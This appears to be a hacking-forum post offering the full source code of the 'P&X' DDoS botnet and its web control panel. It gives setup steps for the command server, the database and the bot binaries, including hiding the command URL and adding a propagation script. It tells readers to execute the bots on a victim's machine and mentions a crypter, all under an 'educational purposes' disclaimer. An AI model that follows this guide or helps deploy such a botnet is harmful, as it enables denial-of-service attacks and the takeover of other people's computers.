[ Hacking ] P&X DDOS BOTNET ๐Ÿš€ Panel Full Source Code๐Ÿ”ฅ

  • ๐Ÿ’ŒImportant Message to All Fellas๐Ÿ’Œ

    ๐Ÿ’ŒImportant Message to All Fellas ๐Ÿ’Œ

    โš ๏ธThank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    โ›” Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    ๐Ÿ† Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    โ˜ฃ๏ธ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    ๐ŸŽฏ Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    โค๏ธ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. โค๏ธ

demo.png

๐Ÿš€๐Ÿ’€ P&X Botnet โ€“ Power & Stealth Combined! ๐Ÿ˜ˆ๐Ÿ”ฅ

๐ŸŒŸ For Educational Purposes Only ๐ŸŽ“
๐Ÿ“ข Disclaimer: This project is purely for learning and research. Made for fun! ๐Ÿ˜„

๐ŸŽฏ What is P&X Botnet?
๐Ÿ–ฅ๏ธ Cross-Platform โ€“ Built with C for flexibility!
๐ŸŒ HTTP Server Based โ€“ Simple yet powerful!
๐Ÿ’ฅ Layer 4 & Layer 7 Attacks โ€“ 11 methods packed in!
๐ŸŽจ Bootstrap UI โ€“ Sleek & modern interface!
๐Ÿ›ฐ๏ธ ENCOM DOME Integration โ€“ Sci-fi vibes in real life!

๐Ÿ›  Setup Guide

๐Ÿ’พ For Server:

(sudo) apt install apache2 php mariadb-server mariadb-client php php-cli php-fpm php-json php-pdo php-mysql php-zip php-gd php-mbstring php-curl php-xml php-pear php-bcmath
(sudo) mkdir /var/www/html
(sudo) mv WEB/* /var/www/html/
cd ../DB
(sudo) mysql


๐Ÿ”ฅ MySQL Configuration:

CREATE DATABASE IF NOT EXISTS px_base;
USE px_base;
SOURCE db.sql;
CREATE USER 'px_user'@'localhost' IDENTIFIED BY 'px_pass';
GRANT ALL PRIVILEGES ON * . * TO 'px_user'@'localhost';
FLUSH PRIVILEGES;


๐Ÿ”ง Edit config/config.php to match credentials!

๐Ÿณ For Docker: cd ./DOCKER
(sudo) make
(sudo) make bash # Open Docker Bash


๐Ÿ–ฅ For Client:

(sudo) apt install gcc make
cd BOT && make
cd url_hider && ./url_hider "your_url_here" or "ip_url_here"
Edit includes/px_botnet.h # Update with hidden URL & propagation script
make re # Compile!
make everything # For cross-compiling!


๐ŸŽฎ How to Use?
๐ŸŒ Website: Default user/password โ†’ test / test
๐Ÿ’ป Bot: Just execute the binaries on the victimโ€™s machine!

drcrypter or drcrypter_ru

 

Forum statistics

Threads
1,833
Messages
35,548
Members
9,216
Latest member
The-Center-Shock
Member time online
746d 7h 7m
Reputation(s)
26